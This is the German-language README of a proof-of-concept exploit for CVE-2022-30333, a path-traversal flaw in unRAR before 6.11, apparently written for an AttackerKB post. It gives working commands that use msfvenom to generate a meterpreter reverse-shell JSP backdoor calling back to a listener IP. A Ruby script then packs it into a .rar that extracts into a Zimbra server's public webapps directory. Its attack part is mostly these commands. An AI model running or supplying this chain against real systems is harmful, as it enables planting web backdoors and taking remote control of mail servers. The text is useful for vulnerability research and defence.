
Ein Proof of Concept für CVE-2022-30333 - eine Path-Traversal-Schwachstelle in unRAR-Versionen vor 6.11. Ich habe dies als Demonstration des Exploits für einen AttackerKB-Beitrag erstellt und hoffe, es bald in ein Metasploit-Modul zu integrieren!
Im Grunde gibst du ein Ziel (einschließlich Path-Traversal) und einige Dateidaten an, und dieses Tool generiert eine .rar-Datei, die diese Datei an diesen Speicherort extrahiert. Die maximale Dateilänge beträgt 104 Bytes und die maximale Dateilänge beträgt 4096 Bytes. (Das ist nicht der Schwachstelle inhärent, sondern nur das, was ich gewählt habe, als ich die Datei generiert habe).
Erzeuge zum Beispiel eine Backdoor mit msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Erstelle dann eine .rar-Datei und platziere die .jsp an einem unterhaltsamen Ort:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar